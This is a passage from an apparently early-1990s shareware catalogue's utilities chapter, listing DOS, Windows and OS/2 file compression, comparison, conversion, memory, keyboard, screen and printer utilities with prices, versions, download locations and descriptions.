$45.00 + Registration benefits: Printed manual. Upgrade to current + version. Special Offer on further upgrades. Application + Support. + Version: 1.10 (02-20-91) + User benefits: Printed manual. Upgrade to current version. + Special Offer on further upgrades. Application Support. + Look for: availability unknown on BBSs; SLIM11.EXE in IBMSYS + forum LIB 6 on CompuServe. + Download size: 38k + Description: + A powerful file compressor with RAM resident transparent + expander, which gives painless access to compressed files. This + is done by intercepting DOS calls, allowing applications to + read compressed files just as before. So there is no need to + worry about technicalities like archives. Just add the command + 'SLIM ON' to AUTOEXEC.BAT and forget it. Over half of SLIM Ver + 1.00/1.01 users who answered a questionnaire said it let them + postpone or cancel a hard disk upgrade. + + Chapter 2, "Utilities" 37 + + + + Product: WinZip [***] + Needs: IBM AT (80286), Windows 3.0 or better. PKZIP/PKUNZIP and/ + or LHA. + Author: Nico Mak + Registration: $29.00 + Registration benefits: Master disks, CompuServe/BIX/mail support. + Version: 3.1 (04-06-92) + User benefits: Master disks, CompuServe/BIX/mail support. + Look for: WINZIP*.ZIP on BBSs; WINZIP.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 100k + Description: + Windows ZIP/LZH/SFX/ARC shell featuring an intuitive point and + click interface. View, Run, Extract, Add, Delete, and Virus + Scan files in archives. The main window contains a tool bar + and sortable scrollable list of files in an archive. Double + click in the list to view a file with the appropriate + application. Features extensive help and easy installation. + Optionally creates temporary Program Manager group with icons + for each file in an archive. Supports Windows 3.1 Drag and + Drop interface. + + Product: ZiPaper + Randomly select Wallpaper - store compressed! See full + description on page 346. + + 2.2.4 File comparison + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 13. + + Product: FCOMP [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: Gamma Software, 303-667-9960 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 1.01 (01-10-92) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: FCOMP101.ZIP on BBSs; FCOMP1.ZIP in IBMNET forum LIB 6 + on CompuServe; FCOMP101.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 112k + Description: + Compares 2 text files and displays their differences. It is + fast, friendly and easy to use. This program is especially + useful to programmers who want to identify changes made in a + source file from one version to the next. It can operate in + batch or interactive mode. Interactive mode features a windows- + like file selection menu and a scrollable display of the + comparison. Comparison menu options include: locate next diff, + print and save to file. Mouse, EGA 43/VGA 50 line modes + supported. + + Chapter 2, "Utilities" 38 + + + + Product: SHERLOCK [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Gulf Sierra, 301-460-0354 + Registration: $25.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Version: 2.60 (07-04-91) + User benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: SHERLK26.ZIP on BBSs (call 202-547-2008 to download it + at no charge); SRLK26.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 121k + Description: + A text comparison utility, compares two ASCII files line by + line. Displays five lines from each file in separate windows. + You may scroll either or both files passed the mismatch to put + them in sync and continue. Either file can be automatically + scanned to locate a line matching the line selected in the + other file. Contains features for searching, jumping around the + files and copying lines to a printer. This is a tool for + programmers and writers. + + 2.2.5 File conversion + + See also: Writing applications, File format translators + (page 139); Database applications, File format translators + (page 162); Communications, File format translators (page 184); + Finances, File format translators (page 254); Business, File + format translators (page 226); Graphics, File format + translators (page 340). + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 13. + + Product: dPerfect Merge [***] + Needs: IBM PC, DOS 3.1 or better. + Author: Newdorf Research, 619-942-0688 + Registration: $24.00 + Registration benefits: Printed manual, key to bypass initial + screen, 90 days support. + Version: 1.6 (04-09-92) + User benefits: Printed manual, key to bypass initial screen, 90 + days support. + Look for: availability unknown on BBSs; DPERF.ZIP in WPSGA forum + LIB 6 on CompuServe. + Download size: 229k + Description: + Converts xBase compatible data (dBase III, Fox, Clipper, etc.) + to Word Perfect secondary files for mail merge applications. + Features record and field selection, and record sorting. Allows + American/European date format. Converts European characters. + Single- or multi-user. Prints summary sheets and creates setup + + Chapter 2, "Utilities" 39 + + + + files to automate the conversion. Includes interactive and + batch versions, as well as Clipper object module. + + Product: LJ2DJ [***] + Converts LaserJet fonts to DeskJet fonts. See full description + on page 53. + + Product: PCX2FNT [***] + Create fonts for LaserJet from PCX graphics. See full + description on page 60. + + Product: PCX2PCL [***] + PCX To PCL File Conversion and LJ Macros. See full description + on page 60. + + Product: TDisplay + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $39.00 + Registration benefits: Printed manual, master disks, support, + free updates, upgrade discounts, bonus utilities. + Version: 1.2 (02-03-92) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; TDSP12.ZIP in DTPFORUM + forum LIB 7 on CompuServe; TDSP12.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 76k + Description: + Converts ASCII text to self-displaying .EXE file. Prints at the + touch of a hot-key. User can control background color, up to 4 + text colors per file, border type (or none), margins. Unlimited + file size; scrolling and word-wrap; user key prompt line. + Optional password protection. + + 2.2.6 File viewers + + See also: Writing applications (page 127). + + Chapter 2, "Utilities" 40 + + + + Product: Browse/2 + Needs: IBM AT (80286), OS/2 1.1 or better. + Author: Wolf Software Design, 619-292-7706 + Registration: $25.00 + Registration benefits: Copy of current version, one free upgrade + and notice of future upgrades. + Version: 1.34 (07-26-91) + User benefits: Copy of current version, one free upgrade and + notice of future upgrades. + Look for: availability unknown on BBSs; BROWSE.ARC in IBMOS2 + forum LIB 2 on CompuServe. + Download size: 35k + Description: + This OS/2 Presentation Manager file viewer displays files of + any size in ASCII or hexadecimal format with both horizontal + and vertical scrolling. + + The file, or selected portions of it, can be copied to the + Presentation Manager clipboard or output to a printer. + + The search feature locates words or phrases and displays them + in context. User options include a choice of display fonts and + sizes, line numbering, tab stop intervals and printer controls. + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 13. + + Product: TDisplay + Creates Customized Self-Displaying Text Files. See full + description on page 40. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 131. + + + 2.3 Hardware utilities + + 2.3.1 CPU & memory utilities + + Product: AutoCon + Autoexec/Config reconfiguration manager. See full description + on page 74. + + Product: dBF-View + DBF File viewer plus other usefull Utilities. See full + description on page 166. + + Chapter 2, "Utilities" 41 + + + + Product: HiMOVE + Needs: IBM PC, DOS 3.0 or better. 286 NEAT CHIPSet or NEATsx + CHIPSet or AT/386 CHIPSet or other upper memory hardware. + Author: C.Sitte Softwaretechnik + Registration: $40.00 + Registration benefits: current disk, printed manual, six month + free support, notification of next upgrade. + Version: 2.14 (11-01-90) + User benefits: current disk, printed manual, six month free + support, notification of next upgrade. + Look for: HIMOV???.* on BBSs; MOV*.* in IBMSYS forum LIB 3 on + CompuServe. + Download size: 115k + Description: + Uses the shadow RAM of Computers with NEAT-Chipset (Chips & + Technologies) to load device drivers and resident programs into + unused areas of the upper memory area. Easy installation and + configuration. No editing of AUTOEXEC.BAT or CONFIG.SYS files. + + Product: PC-INFO + Displays snapshot of system HW, SW & mem.dev. See full + description on page 76. + + Product: Snooper, the system checker [***] + Fast, friendly, flexible system info utility. See full + description on page 76. + + Product: SWAPDOS + Needs: IBM PC, DOS 3.1 or better. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Printed Manual and Diskette. + Version: 1.00 (02-01-90) + User benefits: Printed Manual and Diskette. + Look for: availability unknown on BBSs; SWAPDS.COM in PCVENC + forum LIB 6 on CompuServe. + Download size: 35k + Description: + Lets you switch from one large application to another, keeping + your place in one while workingin the other. For example, you + can have Microsoft Word swapped to EMS or disk, while you are + looking at a Lotus 1-2-3 spreadsheet. + + 2.3.2 Keyboard utilities + + Product: BATUTIL + Batch Enhancement Language. See full description on page 68. + + Chapter 2, "Utilities" 42 + + + + Product: Newkey + Needs: IBM PC, DOS 2.0 or better. + Author: FAB Software, 508-358-6357 + Registration: $43.00 + Registration benefits: Printed manual. + Version: 5.4 (06-21-91) + User benefits: Printed manual. + Look for: availability unknown on BBSs; NEWKEY.ARC in IBMSYS + forum LIB 4 on CompuServe. + Download size: 190k + Description: + A keyboard macro processor which, besides allowing you to + automate repetitive command sequences, provides a shorthand + mode, display macros, menu macros, screen saver, extended + keyboard buffer, cursor speedup without overrun, cut & paste, a + full-featured macro editor, support for EMS, and many more + features. This latest version adds if functions to test the + screen and a print screen function. + + Product: STACKEY + Needs: IBM PC, DOS 2.0 or better. + Author: CTRLALT Associates + Registration: $49.00 + Registration benefits: Printed manual, CompuServe support. + Version: 4.0 (12-23-91) + User benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 360k + Description: + Has the basic function of stacking keystrokes. It uses English + like F1 for the F1 key rather than cryptic hex codes. It + includes simulated pressing of lock keys, shifts, support for + Carousel, Desqview and hotkey/screen reading script control. + + PC Magazine called it the 'ultimate batch enhancer' and PC + World and PC Computing included it in "Best of.." articles. + + Version 4.0 has a keyboard recorder and more script control, + including branching on hotkeys and screen strings. + + Chapter 2, "Utilities" 43 + + + + 2.3.3 Screen utilities + + Product: BLANK-IT [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Rhode Island Soft Systems, Inc., 401-658-4632 + Registration: $15.00 + Registration benefits: Newsletter/BBS support, product discounts. + Version: 5.1a (03-02-92) + User benefits: Newsletter/BBS support, product discounts. + Look for: BLANK51A.ZIP on BBSs (call 401-658-3465 to download it + at no charge); BLANK5.ZIP in IBMHW forum LIB 3 on CompuServe; + BLANK51A.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 57k + Description: + Blacks out the computer display after a certain "time out" + period so that the computer screen won't become burned in. Burn + in is NOT uncommon and can destroy a monitor. Contains several + advanced features such as a quick blank "hot key" ("Boss key"), + the ability to enable/disable itself while it's loaded, and + much more. Works with all monitors and is compatible with + Windows! Smaller and faster than the rest with more features + and excellent support! + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 104. + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 288. + + Product: Quilt + Create intriguing patterns/scrn saver option. See full + description on page 346. + + Product: Swap! + Instant DOS Shell for Ventura Publisher Gem. See full + description on page 138. + + Product: Utility_Belt + .BAT file enhancements. See full description on page 73. + + 2.3.3.1 EGA/VGA + + Product: RIE - Rimrock Icon Editor + Editor for creating custom EGA/VGA text icons. See full + description on page 299. + + 2.3.4 286/386/486 utilities + + Product: HiMOVE + Upper Memory Manager. See full description on page 40. + + Chapter 2, "Utilities" 44 + + + + Product: LiteSPM + Capture serial port data in the background. See full + description on page 125. + + + 2.4 Printer utilities + + See also: Utilities, System Utilities, Screen capture + (page 77); Database applications, Mailing label systems + (page 158). + + Product: ACCU Music Printer + Prints out sheet music, transposes, etc. See full description + on page 375. + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 54. + + Product: DISK SPOOL II + Needs: IBM PC, DOS 2.0 or better. + Author: Budget Software Company, 303-695 9095 + Registration: $44.00 + Registration benefits: Full tech support; printed manual; latest + version; mailing list; + Version: 4.00 (06-27-91) + User benefits: Full tech support; printed manual; latest version; + mailing list; + Look for: availability unknown on BBSs; DS.EXE in IBMSYS forum + LIB 3 on CompuServe. + Download size: 30k + Description: + A valuable utility for virtually every computer installation. + It enhances all printing/plotting/graphics applications by + allowing all printing functions to occur in the background. + Furthermore, you control how data is printed, when it is + printer, and where it is printed...all by means of a + sophisticated pop-up menu. Advanced features: + * use of Extended and/or Expanded memory + * ability to load multiple copies for driving multiple + printers + + Product: LJLAND [***] + Print docs, listings, manuals, spreadsheets. See full + description on page 59. + + Product: PCX2FNT [***] + Create fonts for LaserJet from PCX graphics. See full + description on page 60. + + Product: Plot-Line + Command line HP-GL background file plotter. See full + description on page 278. + + Chapter 2, "Utilities" 45 + + + + Product: Print-it + Needs: IBM PC, DOS 3.0 or better. + Author: Cybernetic Software, 708-677-8358 + Registration: $10.00 + Registration benefits: Master disks, source code. + Version: 1.0 (01-11-90) + User benefits: Master disks, source code. + Look for: PRTIT10.ZIP on BBSs (call 312-764 0591 to download it + at no charge). + Download size: 8k + Description: + Takes an ASCII file and print it one record per line, with + wrap, if the line is too long. It will number the lines. At the + top of each page of the print-out is the file name and page + number. + + Product: PrintCAD [***] + Needs: IBM PC, DOS 2.0 or better. 400K of EMS or XMS memory. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $49.00 + Registration benefits: Printed manual, master disks, BBS/mail + support. + Version: 1.14 (04-26-92) + User benefits: Printed manual, master disks, BBS/mail support. + Look for: PCAD.ZIP on BBSs (call 606-268-0577 to download it at + no charge); PCAD.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 84k + Description: + Provides a printer driver for AutoCAD, AutoSketch, GenCADD, + Draft Choice, PC-Draft-CAD, and other IBM/DOS CAD packages. It + prints directly from CAD software via the ADI or HP-GL plotter + driver. Supports Epson and IBM 9 pin printers, Epson, Fujitsu, + IBM, NEC, and Toshiba 24 pin printers, HP LaserJet, DeskJet, + PaintJet, Canon LBP, BJ, BJC, IBM ExecJet, LaserPrinter, + Quietwriter, PostScript, PCX files, and others. User selectable + pen width, shading, color, and paper size, magnification, etc. + + Product: PrintGL [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $50.00 + Registration benefits: Printed manual, master disks, BBS/mail + support. + Version: 1.24 (04-26-92) + User benefits: Printed manual, master disks, BBS/mail support. + Look for: PRINTGL.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRNTGL.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 110k + Description: + A pen plotter emulator for IBM/DOS systems. It prints or + displays HP-GL (7475, 17440) files on Epson and IBM 9 pin + printers, Epson, Fujitsu, IBM, NEC, and Toshiba 24 pin + printers, HP Laserjet, Deskjet, PaintJet, IBM ExecJet, + LaserPrinter, Quietwriter, Canon LBP, BJ, BJC, Tek ColorQuick, + + Chapter 2, "Utilities" 46 + + + + Kodak Color 4, PostScript printers, and others, CGA, EGA, VGA, + and HGC displays, and outputs PCX files. User selectable pen + width, color, shading, and paper size, magnification, etc. + + Product: PrintPlus + Needs: IBM PC, DOS 2.1 or better. + Author: Lambert Klein, 708-397-1221 + Registration: $23.95 + Registration benefits: Master disks, printed manual, utilities. + Voice/mail/BBS support. + Version: 6.0 (01-01-92) + User benefits: Master disks, printed manual, utilities. Voice/ + mail/BBS support. + Look for: P6.ZIP on BBSs (call 215-623-6203 to download it at no + charge); P6.ZIP in IBMHW forum LIB 2 on CompuServe; P6.ZIP in + IBM RTC LIB 5 on GEnie. + Download size: 73k + Description: + A menu driven, mouse supported utility program. Tag and Print, + copy, move and delete files. Maintainence utilities. Paper + saving options. Prints Line numbers, Select pages, headers. + Adjustable margins and page lenght. Can tag files for + independed number of copies for each file. Can redirect to an + ASCII file. Features to tweek the output such as, Smart mode, + left space trim, strip line feeds within paragraphs. Powerful, + yet easy and very convenient to use. Continuous and single + sheets. + + Product: Rubicon Publisher + Full-Featured Typesetter With Fonts. See full description on + page 138. + + Product: TSR Download + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer, or HP + DeskJet printer with RAM cartridge. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $45.00 + Registration benefits: Perfect bound manual, telephone support, + FONTCAT utility. + Version: 2.9b (05-20-91) + User benefits: Perfect bound manual, telephone support, FONTCAT + utility. + Look for: availability unknown on BBSs; TSRDL*.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 150k + Description: + Memory resident soft font manager for LaserJet and DeskJet + printers locates fonts automatically and displays them in + English. Compresses LaserJet soft fonts to 1/6 their normal + size. Pops up over any application program to allow easy font + control. It even remembers what fonts are in your printer. + Select or delete fonts, control line spacing plus much more. + Requires 7K of RAM as a TSR or works from the command line. + Full DOS & Windows 3.0 support. New scalable font support. + + Chapter 2, "Utilities" 47 + + + + 2.4.1 Printer control + + Product: DMP + Needs: IBM PC, DOS 2.1 or better. + Author: DMP Software, 415-341-2702 + Registration: $29.00 + Registration benefits: Support by CompuServe, mail & phone. Next + update free. + Version: 2.05 (01-15-91) + User benefits: Support by CompuServe, mail & phone. Next update + free. + Look for: DMP*.* on BBSs; DMPLZH.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 60k + Description: + Very versatile printer driver/spooler. Spool to Expanded, + Extended, HMA and/or system memory and/or disk. Serial or + parallel printer or print to disk file. Fast spooling and + output for all types of printers including Laser, dot-matrix, + etc. Optional character conversions, many other features. + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 56. + + Product: ESF's DeskJet Fonts & Utilities + Soft fonts, printer drivers, + utilities. See full description + on page 52. + + Product: ESF's European DeskJet Fonts + Soft fonts to print western European lang. See full + description on page 52. + + Product: ESF's European LaserJet Fonts + Soft fonts to print Western European lang. See full + description on page 57. + + Product: ESF's LaserJet Fonts & Util. + Soft fonts, printer drivers, & utilities. See full description + on page 57. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 24. + + Product: LASR-MAN + Laser printer utility for multi-pages/sheet. See full + description on page 58. + + Chapter 2, "Utilities" 48 + + + + Product: LQ + Needs: IBM PC, DOS 2.0 or better. 9-pin dot matrix printer. + Author: Granny's Old-Fashioned Software, 704-264-6906 + Registration: $35.00 + Registration benefits: Current disk & manual, update disk, + technical support, commissions. + Version: 2.35 (10-01-90) + User benefits: Current disk & manual, update disk, technical + support, commissions. + Look for: availability unknown on BBSs; LQ235.ZIP in IBMHW forum + LIB 2 on CompuServe. + Download size: 240k + Description: + Lets you obtains near-letter quality from 9-pin dot-matrix + printers in a variety of fonts. The program works invisibly + with your word processor so you can continue to use familiar + commands for print options such as emphasized, underline, + italics, etc. Changing fonts can be done by inserting codes or + by using LQ's pop-up window. Cs customized spooler handles + printing tasks efficiently in the background. Also included: + Font editor, banner printer, letterhead editor. + + Product: LQMATRIX [***] + Softfonts and softfont editor for Epson LQ. See full + description on page 50. + + Product: PPRINT + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version, BBS access, and updates. + $45 for package of 8 utilities with bound manual. Money Back + Gurantee. + Version: 5.3 (04-29-91) + User benefits: Latest version, BBS access, and updates. $45 for + package of 8 utilities with bound manual. Money Back Gurantee. + Look for: PPRINT53.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PPRINT.ZIP in IBMSYS forum LIB 3 on CompuServe; + PPRINT53.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 85k + Description: + A great ASCII file printing tool providing extensive file + selection and formatting. It uses printer definition files to + support any printer. Specify print size, margins, headings, + footings, line numbering, and even data selection. Print two + pages per piece of paper on a laser printer. Scans a directory + to select multiple files to print. Set lines per page and cols + per line. Featured in Dr. File Finder's Guide to Shareware. + + Chapter 2, "Utilities" 49 + + + + Product: PrinterBUDDY + Needs: IBM PC, DOS 2.0 or better. + Author: Lenard Dean + Registration: $15.00 + Registration benefits: Printed manual, master disks. + Version: 2.01 (03-29-92) + User benefits: Printed manual, master disks. + Look for: PB201.EXE on BBSs (call 403-280-4938 to download it at + no charge); PB201.EXE in IBMHW forum LIB 2 on CompuServe; + PB201.LZH in IBMPC RTC LIB 5 on GEnie. + Download size: 48k + Description: + A utility that allows you to configure ANY type of printer + using the printer's built-in commands and formatting codes. + Easy to use yet very powerful. You can select printer + configurations from a menu list or from the command line + (useful in batch files). Completely customizable. In the TSR + version, you can even define your own hot key and specify how + the TSR will load into memory (ie. conventional, swap-to-EMS, + or swap-to-disk). + + 2.4.2 Bar codes + + Product: GRAB Plus(r) + Envelope Addressor & Database. See full description on + page 63. + + Product: GRAB Plus(r) for Windows + Windows Envelope Printing Utility. See full description on + page 64. + + Product: Label Master [***] + PC Magazine Editors Choice mailing list prog. See full + description on page 159. + + Product: Mail Machine [***] + Print Envelopes and Labels on all LaserJets. See full + description on page 64. + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 65. + + Chapter 2, "Utilities" 50 + + + + 2.4.3 Printer specific + + Product: Citizen + Needs: IBM PC, DOS 2.0 or better. Citizen MSP or Tribute + printer, 360k RAM. + Author: R.K. West Consulting + Registration: $10.00 + Registration benefits: Latest version, free mail support, 900- + number phone support, CIS support, upgrade notices. + Version: 3.02 (01-01-92) + User benefits: Latest version, free mail support, 900-number + phone support, CIS support, upgrade notices. + Look for: CITI*.ZIP on BBSs; CTZN*.ZIP in IBMHW forum LIB 2 on + CompuServe. + Download size: 1k + Description: + This menu-driven utility lets you control the fonts on your + Citizen MSP or Tribute printer. You can also print small text + files and type envelopes from the program. + + 2.4.3.1 Epson + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 56. + + Product: LQMATRIX [***] + Needs: IBM PC, DOS 2.1 or better. Epson LQ printer. + Author: Jimmy Paris Software, 804-295-5496 + Registration: $19.50 + Registration benefits: Printed manual, unlimited mail/phone + support, upgrade discounts. + Version: 4.41 (04-12-92) + User benefits: Printed manual, unlimited mail/phone support, + upgrade discounts. + Look for: LQMTX44*.ZIP (multiple files) on BBSs; LQMTX$.ZIP in + EPSON forum LIB 1 on CompuServe. + Download size: 350k + Description: + Provides a user friendly environment for designing fonts for + Epson LQ dot matrix printers & compatibles. It comes with over + fifty ready made fonts including Script, Italics, Cyrillic, + Greek, Hebrew, Large Type, & attractive fonts especially + designed by talented graphic designers. The documentation + includes instructions for using the fonts with various word + processors including WP 5.1, PCWrite 3, XYwrite, & Word 5.5. + The downloader, LQ.EXE, also serves as a printer setter. + + 2.4.3.2 HP DeskJet + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 53. + + Chapter 2, "Utilities" 51 + + + + Product: 4Shell for Windows + Runs 4Print and 4Book under Windows. See full description on + page 54. + + Product: BOOKLET [***] + PC Booklet printing utility. See full description on page 55. + + Product: BOOKLET-SCREEN [***] + PC Booklet printing utility. See full description on page 55. + + Product: DJ-CHECK + Needs: IBM PC, DOS 3.0 or better. HP DeskJet series printer, any + size checks. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Registration benefits: Printed manual, one year CompuServe/mail + support. + Version: 1.01 (03-01-92) + User benefits: Printed manual, one year CompuServe/mail support. + Look for: DJCHEK.ZIP on BBSs; DJCHEK.ZIP in HPPER forum LIB 5 on + CompuServe; DJCHEK.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 60k + Description: + Print any size checks (personal or business) using any DeskJet + printer. Fully configurable for perfect printing placement on + any size check. Keeps a record on disk or each check you print, + and keeps a running balance as you print checks. + + Product: DJ-LOPE + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Registration benefits: One year mail/CIS support, printed manual. + Version: 3.0 (03-01-92) + User benefits: One year mail/CIS support, printed manual. + Look for: DJLOPE.ZIP on BBSs; DJLOPE.ZIP in HPPER forum LIB 5 on + CompuServe; DJLOPE.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 65k + Description: + Print envelopes on the DeskJet family of printers on the fly or + from multiple databases of up to 250 adresses each. Supports + internal and cartridge fonts. Toggle return address on or off, + search, add, delete records. Supports internal and font + cartridges, prints to LPT1, 2 or 3. Easy-to-use menu driven + interface. + + Chapter 2, "Utilities" 52 + + + + Product: DJ-SLEEVE + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Registration benefits: One year mail/CIS support, printed manual. + Version: 2.0 (03-01-92) + User benefits: One year mail/CIS support, printed manual. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP in HPPER forum LIB 5 on + CompuServe; SLEEVE.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 25k + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your DeskJet will print out + a sleeve template containing the names of all the files (date + and size for each file, too). Just cut it out, fold back the + flaps and tape or glue, and you have a storage sleeve for your + 51/4" & 31/2" disks. + + Product: DOWNLOAD [***] + Download fonts and macros to Laser/DeskJet. See full + description on page 56. + + Product: ESF's DeskJet Fonts & Utilities + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Registration benefits: Telephone support. + Version: 1.5 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; DJFNT5.ZIP in HP forum + LIB 5 (multiple files) on CompuServe. + Download size: 330k + Description: + Collection of 18 soft fonts for HP DeskJet printers. (All 3 + models.) Printer drivers for WordPerfect 5.0 & 5.1, MS Word + 5.X, MS Works, PC Write, and Windows 3.0. Fonts include Helv & + Roman 10 & 12 point medium/bold/italic, Script & Old English 8 + & 10 point, Symbols 24 point, and Square 10 point 10 pitch. + Utility programs for downloading and printing sample pages. + Easy to use INSTALL program and new tutorial on soft fonts. + + Chapter 2, "Utilities" 53 + + + + Product: ESF's European DeskJet Fonts + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer with RAM + cartridge. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $25.00 + Registration benefits: Telephone support. + Version: 1.0 (07-10-91) + User benefits: Telephone support. + Look for: availability unknown on BBSs; EDFNT1.ZIP in HP forum + LIB 5 on CompuServe. + Download size: 340k + Description: + A collection of 12 soft fonts that print in almost any western + European language, including English, German, French, & + Spanish. Includes Roman, Helv, and Garamond in 12 point m/b/i + + 18 point bold all with the PC-8 symbol set. Also has utilities + for downloading and sample page printing. Printer drivers for + WordPerfect 5.1, MS Word 5.X, MS Works, and Windows are + included. Now with easy install program and tutorial on soft + fonts. + + Product: LASR-MAN + Laser printer utility for multi-pages/sheet. See full + description on page 58. + + Product: LJ2DJ [***] + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer with RAM + (font) cartridge. + Author: TaxWare, 801-373-0541 + Registration: $29.95 + Registration benefits: Master disks, phone/mail support, bonus + utilities. + Version: 2.4 (01-11-92) + User benefits: Master disks, phone/mail support, bonus utilities. + Look for: L2D.ZIP on BBSs; L2D.ZIP in HPPER forum LIB 5 on + CompuServe. + Download size: 120k + Description: + Converts LaserJet format soft fonts into DeskJet format soft + fonts. Includes DJView for displaying the characters of + DeskJet fonts on screen; DJInfo for displaying technical info + of a DJ font; FontInfo, a DIR-like command-line utility for LJ + & DJ soft fonts; DJLand for printing text files in landscape + orientation; DOWNLOAD for downloading fonts. Specify wildcards + to convert several fonts at once. + + Product: TSR Download + Soft font manager for LaserJet & DeskJets. See full + description on page 46. + + Chapter 2, "Utilities" 54 + + + + 2.4.3.3 HP LaserJet + + Product: 4Print + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP LaserJet or + DeskJet printer. + Author: Korenthal Associates, Inc., 212-242-1790 + Registration: $49.95 + Registration benefits: Typeset illustrated manual, 4FOLD and + KAZAP companion utilities, free technical support, and + notification of major upgrades. + Version: 4.1 (08-15-91) + User benefits: Typeset illustrated manual, 4FOLD and KAZAP + companion utilities, free technical support, and notification + of major upgrades. + Look for: 4PR410.ZIP on BBSs (call 718-837-3236 to download it at + no charge); 4PR410.ZIP in PCVENB forum LIB 3 on CompuServe; + 4PR410.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 240k + Description: + Prints 2 or 3 fully readable pages of text on each sheet of + paper using your LaserJet's or DeskJet's landscape (sideways) + printing capability. Can print on both sides of the page to + yield 4, 6, or even more pages of text per sheet. Perfect for + program listings and documentation; can print one wide column + for spreadsheet and database reports. Includes 4Book for + creating handsome booklets. Supports A4 paper. "Definitely + worth adding to your printer toolbox," says PC Magazine + (3/27/90). + + Product: 4Shell for Windows + Needs: IBM PC, Windows 3.0 or better. 4Print and 4Book from + Korenthal Associates. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $20.00 + Registration benefits: One year mail support, 900# phone support. + Version: 1.0 (08-21-91) + User benefits: One year mail support, 900# phone support. + Look for: 4SHELL.ZIP on BBSs; 4SHELL.ZIP in IBMHW forum LIB 2 on + CompuServe; 4SHELL.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 75k + Description: + This Windows 3.0 program will allow you to use the popular + LaserJet and DeskJet utilities, 4Print and 4Book, under + Windows. You *must* download the file 4PR410.ZIP (from + Korenthal Associates) in order to use this program. 4Shell will + allow you to select the options and build a "configuration" for + both 4Print and 4Book and save the options as your default. + + Chapter 2, "Utilities" 55 + + + + Product: Badge-O-Magic + Needs: IBM PC, DOS 2.1 or better. 384k RAM. HP LaserJet+ + printer. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Registration benefits: Next version free plus 90 days free + support by phone/mail/BBS. Badge supplies also available to + registered users at discounted prices. + Version: 1.2 (07-10-89) + User benefits: Next version free plus 90 days free support by + phone/mail/BBS. Badge supplies also available to registered + users at discounted prices. + Look for: BADGE12.ZIP on BBSs (call 404-879-5985 to download it + at no charge); BADG11.EXE in IBMAPP forum LIB 7 on CompuServe; + BADGE12.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 360k + Description: + Introducing a convenient, easy-to-use and affordable way to + prepare name tags for conventions, meetings, and social + gatherings. Using virtually any PC with a LaserJet II-compat. + printer, you now can quickly generate easy-to-read name tags. + + Six custom soft fonts areincluded with the software ranging in + size from 10 to 40 points. Includes a dBASE compatible file + manager to manipulate your data bases for printing. Label + template makes it easy to buy label 